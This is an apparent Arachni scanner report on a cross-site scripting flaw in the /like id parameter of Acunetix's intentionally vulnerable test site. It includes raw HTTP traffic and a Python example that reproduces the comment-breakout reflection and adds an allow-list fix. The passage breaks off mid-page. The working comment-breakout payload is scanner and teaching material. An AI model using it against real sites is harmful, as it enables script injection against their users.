Affected vector: link input `id`, submitted with GET from http://testhtml5.vulnweb.com/ and pointing to http://testhtml5.vulnweb.com/like.
<a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"> <i class="icon-thumbs-up" title="Like"> </i> </a>
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| link | http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/like | | http://testhtml5.vulnweb.com/like?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E |
Raw HTTP request used to retrieve the page.
GET /like?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Thank you very much for your feedback! <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
<link src='http://localhost/link'>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
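The response above shows why the scanner flagged this link: the `id` value is copied verbatim into an HTML comment (`<!-- 696a3680438a7af53a0a54d3d26469bf -->`), so a value containing `-->` closes the comment and everything after it is parsed as markup. Arachni's marker element `<xss_0c25785427908905790d3a663dc49fa7/>` landing outside the comment is the proof. The Python below is added here as a worked example; it is not code from the test site or from Arachni. It reproduces the reflection in a minimal template, uses the standard-library HTML parser to check whether the marker became a live element, and shows the fix, an allow-list on the parameter. The template string and the assumption that item ids are 32 lowercase hex characters (the shape of every id in the scan output) are choices made for the example.

```python
import re
from html.parser import HTMLParser

# Constructed for this example: the /like response reflects the id parameter
# verbatim inside an HTML comment, and that is all this template does.
VULNERABLE_TEMPLATE = "Thank you very much for your feedback! <!-- {item_id} -->"

# Assumption (not stated by the page): item ids are 32 lowercase hex characters.
ITEM_ID_RE = re.compile(r"[0-9a-f]{32}")

# Taken from the scanner's request: the original id, Arachni's scan seed, and
# the URL-decoded payload it appended to the id.
BASE_ID = "696a3680438a7af53a0a54d3d26469bf"
SEED = "0c25785427908905790d3a663dc49fa7"
PAYLOAD = BASE_ID + "</textarea>--><xss_" + SEED + "/><!--<textarea>"


def render_vulnerable(item_id):
    """Reflects the parameter without validation, as the test site does."""
    return VULNERABLE_TEMPLATE.format(item_id=item_id)


def render_hardened(item_id):
    """Allow-lists the parameter before it reaches the template.

    Output encoding is the wrong tool here: the value is never shown to the
    user, so anything that is not a well-formed id is simply rejected.
    """
    if not ITEM_ID_RE.fullmatch(item_id):
        raise ValueError("item id must be 32 lowercase hex characters")
    return VULNERABLE_TEMPLATE.format(item_id=item_id)


def hardened_rejects(item_id):
    """True if the hardened renderer refuses the value."""
    try:
        render_hardened(item_id)
    except ValueError:
        return True
    return False


class _TagRecorder(HTMLParser):
    """Records which names the parser treats as real elements and which text
    it treats as comment data."""

    def __init__(self):
        super().__init__()
        self.start_tags = []
        self.comments = []

    def handle_starttag(self, tag, attrs):
        self.start_tags.append(tag)

    def handle_comment(self, data):
        self.comments.append(data)


def _parse(body):
    rec = _TagRecorder()
    rec.feed(body)
    rec.close()
    return rec


def marker_is_live(body, seed):
    """True if the scanner's marker element xss_<seed> is parsed as an element,
    i.e. the payload's '-->' closed the comment it was reflected into."""
    return f"xss_{seed}" in _parse(body).start_tags


def comment_texts(body):
    """The comment bodies the parser sees; shows where the comment was cut."""
    return _parse(body).comments


if __name__ == "__main__":
    print("vulnerable, payload :", marker_is_live(render_vulnerable(PAYLOAD), SEED))
    print("comment data        :", comment_texts(render_vulnerable(PAYLOAD)))
    print("hardened rejects    :", hardened_rejects(PAYLOAD))
```

With the payload, the vulnerable page yields two comments (`" 696a...</textarea>"` and `"<textarea> "`) with the marker element parsed between them; with the original id it yields one comment and no element. The fix rejects rather than encodes because HTML comments have no escaping mechanism, and a blocklist on `-->` alone is not enough: HTML5 parsers also close a comment on `--!>`.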
Transitions describe, as a series of events, the steps required to restore the page to the state it was in when the scanner processed it. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script
src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable 
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering 
for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in 
item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i 
class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" 
ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b 